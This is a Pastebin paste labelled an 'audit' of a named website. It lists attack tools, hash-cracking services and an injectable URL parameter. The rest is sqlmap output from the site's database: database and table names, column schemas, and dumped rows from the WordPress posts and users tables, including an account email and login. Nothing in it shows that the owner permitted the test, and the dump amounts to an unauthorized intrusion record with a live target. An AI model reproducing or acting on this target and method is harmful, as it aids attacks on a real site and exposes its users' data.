API tools faq
paste
Advertisement
CyberVX

Audit [sallatykka]

CyberVX
Aug 20th, 2019
272
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.03 KB | None | 0 0
raw download clone embed print report
  1. Auditor: CyberVX
  2.  
  3. - OS:
  4. # KALI LINUX;
  5. # WHONIX
  6.  
  7. - TOOLS:
  8. # NMAP;
  9. # XPROBE2;
  10. # HASHCAT;
  11. # SQLMAP;
  12.  
  13. - TOOLS SUPPORT:
  14. # https://crackstation.net/, https://www.onlinehashcrack.com/,
  15. # https://hashkiller.co.uk/md5-decrypter.aspx;
  16.  
  17. - VULNERABILITY:
  18. # SQL INJECTION;
  19. # INSECURE CRYPTOGRAPHIC STORAGE;
  20. # FAILURE TO RESTRICT URL ACESS;
  21.  
  22. - TARGET:
  23. # http://www.sallatykka.com
  24. # http://www.sallatykka.com/web/index.php?id=31
  25.  
  26. ========================
  27. REPORT 1
  28. ========================
  29.  
  30. web server operating system: Linux CentOS
  31.  
  32. Available databases:
  33. [*] information_schema
  34. [*] sallatykkaco
  35.  
  36. Database: sallatykkaco
  37. [16 tables]
  38. +-----------------------+
  39. | salla2_images |
  40. | salla2_pages |
  41. | salla_images |
  42. | salla_pages |
  43. | wp_commentmeta |
  44. | wp_comments |
  45. | wp_links |
  46. | wp_options |
  47. | wp_postmeta |
  48. | wp_posts |
  49. | wp_term_relationships |
  50. | wp_term_taxonomy |
  51. | wp_termmeta |
  52. | wp_terms |
  53. | wp_usermeta |
  54. | wp_users |
  55. +-----------------------+
  56.  
  57. Database: sallatykkaco
  58. Table: salla2_pages
  59. [16 columns]
  60. +---------------+------------------------------------------+
  61. | Column | Type |
  62. +---------------+------------------------------------------+
  63. | language | enum('suomi','ruotsi','englanti','null') |
  64. | created_time | datetime |
  65. | end_time | datetime |
  66. | hidden | enum('true','false','link') |
  67. | id | int(11) |
  68. | link | varchar(255) |
  69. | modified_time | datetime |
  70. | parent | int(11) |
  71. | priority | int(11) |
  72. | start_time | datetime |
  73. | template | varchar(255) |
  74. | text1 | text |
  75. | text2 | text |
  76. | text3 | text |
  77. | text4 | text |
  78. | title | varchar(255) |
  79. +---------------+------------------------------------------+
  80.  
  81. Database: sallatykkaco
  82. Table: wp_posts
  83. [23 columns]
  84. +-----------------------+---------------------+
  85. | Column | Type |
  86. +-----------------------+---------------------+
  87. | comment_count | bigint(20) |
  88. | comment_status | varchar(20) |
  89. | guid | varchar(255) |
  90. | ID | bigint(20) unsigned |
  91. | menu_order | int(11) |
  92. | ping_status | varchar(20) |
  93. | pinged | text |
  94. | post_author | bigint(20) unsigned |
  95. | post_content | longtext |
  96. | post_content_filtered | longtext |
  97. | post_date | datetime |
  98. | post_date_gmt | datetime |
  99. | post_excerpt | text |
  100. | post_mime_type | varchar(100) |
  101. | post_modified | datetime |
  102. | post_modified_gmt | datetime |
  103. | post_name | varchar(200) |
  104. | post_parent | bigint(20) unsigned |
  105. | post_password | varchar(20) |
  106. | post_status | varchar(20) |
  107. | post_title | text |
  108. | post_type | varchar(20) |
  109. | to_ping | text |
  110. +-----------------------+---------------------+
  111.  
  112. Database: sallatykkaco
  113. Table: wp_term_taxonomy
  114. [6 columns]
  115. +------------------+---------------------+
  116. | Column | Type |
  117. +------------------+---------------------+
  118. | count | bigint(20) |
  119. | description | longtext |
  120. | parent | bigint(20) unsigned |
  121. | taxonomy | varchar(32) |
  122. | term_id | bigint(20) unsigned |
  123. | term_taxonomy_id | bigint(20) unsigned |
  124. +------------------+---------------------+
  125.  
  126. Database: sallatykkaco
  127. Table: wp_commentmeta
  128. [4 columns]
  129. +------------+---------------------+
  130. | Column | Type |
  131. +------------+---------------------+
  132. | comment_id | bigint(20) unsigned |
  133. | meta_id | bigint(20) unsigned |
  134. | meta_key | varchar(255) |
  135. | meta_value | longtext |
  136. +------------+---------------------+
  137.  
  138. Database: sallatykkaco
  139. Table: wp_users
  140. [10 columns]
  141. +---------------------+---------------------+
  142. | Column | Type |
  143. +---------------------+---------------------+
  144. | display_name | varchar(250) |
  145. | ID | bigint(20) unsigned |
  146. | user_activation_key | varchar(255) |
  147. | user_email | varchar(100) |
  148. | user_login | varchar(60) |
  149. | user_nicename | varchar(50) |
  150. | user_pass | varchar(255) |
  151. | user_registered | datetime |
  152. | user_status | int(11) |
  153. | user_url | varchar(100) |
  154. +---------------------+---------------------+
  155.  
  156. Database: sallatykkaco
  157. Table: wp_terms
  158. [4 columns]
  159. +------------+---------------------+
  160. | Column | Type |
  161. +------------+---------------------+
  162. | name | varchar(200) |
  163. | slug | varchar(200) |
  164. | term_group | bigint(10) |
  165. | term_id | bigint(20) unsigned |
  166. +------------+---------------------+
  167.  
  168. Database: sallatykkaco
  169. Table: wp_links
  170. [13 columns]
  171. +------------------+---------------------+
  172. | Column | Type |
  173. +------------------+---------------------+
  174. | link_description | varchar(255) |
  175. | link_id | bigint(20) unsigned |
  176. | link_image | varchar(255) |
  177. | link_name | varchar(255) |
  178. | link_notes | mediumtext |
  179. | link_owner | bigint(20) unsigned |
  180. | link_rating | int(11) |
  181. | link_rel | varchar(255) |
  182. | link_rss | varchar(255) |
  183. | link_target | varchar(25) |
  184. | link_updated | datetime |
  185. | link_url | varchar(255) |
  186. | link_visible | varchar(20) |
  187. +------------------+---------------------+
  188.  
  189. Database: sallatykkaco
  190. Table: wp_comments
  191. [15 columns]
  192. +----------------------+---------------------+
  193. | Column | Type |
  194. +----------------------+---------------------+
  195. | comment_agent | varchar(255) |
  196. | comment_approved | varchar(20) |
  197. | comment_author | tinytext |
  198. | comment_author_email | varchar(100) |
  199. | comment_author_IP | varchar(100) |
  200. | comment_author_url | varchar(200) |
  201. | comment_content | text |
  202. | comment_date | datetime |
  203. | comment_date_gmt | datetime |
  204. | comment_ID | bigint(20) unsigned |
  205. | comment_karma | int(11) |
  206. | comment_parent | bigint(20) unsigned |
  207. | comment_post_ID | bigint(20) unsigned |
  208. | comment_type | varchar(20) |
  209. | user_id | bigint(20) unsigned |
  210. +----------------------+---------------------+
  211.  
  212. Database: sallatykkaco
  213. Table: salla_images
  214. [4 columns]
  215. +------------+--------------------------------------+
  216. | Column | Type |
  217. +------------+--------------------------------------+
  218. | align | enum('left','center','right','null') |
  219. | file_name | varchar(255) |
  220. | id | int(11) |
  221. | image_name | varchar(255) |
  222. +------------+--------------------------------------+
  223.  
  224. Database: sallatykkaco
  225. Table: wp_options
  226. [4 columns]
  227. +--------------+---------------------+
  228. | Column | Type |
  229. +--------------+---------------------+
  230. | autoload | varchar(20) |
  231. | option_id | bigint(20) unsigned |
  232. | option_name | varchar(191) |
  233. | option_value | longtext |
  234. +--------------+---------------------+
  235.  
  236. Database: sallatykkaco
  237. Table: wp_usermeta
  238. [4 columns]
  239. +------------+---------------------+
  240. | Column | Type |
  241. +------------+---------------------+
  242. | meta_key | varchar(255) |
  243. | meta_value | longtext |
  244. | umeta_id | bigint(20) unsigned |
  245. | user_id | bigint(20) unsigned |
  246. +------------+---------------------+
  247.  
  248. Database: sallatykkaco
  249. Table: wp_postmeta
  250. [4 columns]
  251. +------------+---------------------+
  252. | Column | Type |
  253. +------------+---------------------+
  254. | meta_id | bigint(20) unsigned |
  255. | meta_key | varchar(255) |
  256. | meta_value | longtext |
  257. | post_id | bigint(20) unsigned |
  258. +------------+---------------------+
  259.  
  260. Database: sallatykkaco
  261. Table: salla_pages
  262. [14 columns]
  263. +---------------+------------------------------------------+
  264. | Column | Type |
  265. +---------------+------------------------------------------+
  266. | language | enum('suomi','ruotsi','englanti','null') |
  267. | created_time | datetime |
  268. | end_time | datetime |
  269. | hidden | enum('true','false','link') |
  270. | id | int(11) |
  271. | link | varchar(255) |
  272. | modified_time | datetime |
  273. | parent | int(11) |
  274. | priority | int(11) |
  275. | start_time | datetime |
  276. | template | varchar(255) |
  277. | text1 | text |
  278. | text2 | text |
  279. | title | varchar(255) |
  280. +---------------+------------------------------------------+
  281.  
  282. Database: sallatykkaco
  283. Table: wp_term_relationships
  284. [3 columns]
  285. +------------------+---------------------+
  286. | Column | Type |
  287. +------------------+---------------------+
  288. | object_id | bigint(20) unsigned |
  289. | term_order | int(11) |
  290. | term_taxonomy_id | bigint(20) unsigned |
  291. +------------------+---------------------+
  292.  
  293. Database: sallatykkaco
  294. Table: wp_termmeta
  295. [4 columns]
  296. +------------+---------------------+
  297. | Column | Type |
  298. +------------+---------------------+
  299. | meta_id | bigint(20) unsigned |
  300. | meta_key | varchar(255) |
  301. | meta_value | longtext |
  302. | term_id | bigint(20) unsigned |
  303. +------------+---------------------+
  304.  
  305. Database: sallatykkaco
  306. Table: salla2_images
  307. [4 columns]
  308. +------------+--------------------------------------+
  309. | Column | Type |
  310. +------------+--------------------------------------+
  311. | align | enum('left','center','right','null') |
  312. | file_name | varchar(255) |
  313. | id | int(11) |
  314. | image_name | varchar(255) |
  315. +------------+--------------------------------------+
  316.  
  317. ========================
  318. REPORT 2
  319. ========================
  320.  
  321. Database: sallatykkaco
  322. Table: wp_posts
  323. [3 entries]
  324. +----------------+---------------+
  325. | post_name | post_password |
  326. +----------------+---------------+
  327. | <blank> | <blank> |
  328. | esimerkkisivu | <blank> |
  329. | moikka-maailma | <blank> |
  330. +----------------+---------------+
  331.  
  332. Database: sallatykkaco
  333. Table: wp_users
  334. [1 entry]
  335. +---------------------------+--------------+------------+
  336. | user_email | user_pass | user_login |
  337. +---------------------------+--------------+------------+
  338. | lol.lol@tenminutemail.com | <blank> | D3moN |
  339. +---------------------------+--------------+------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!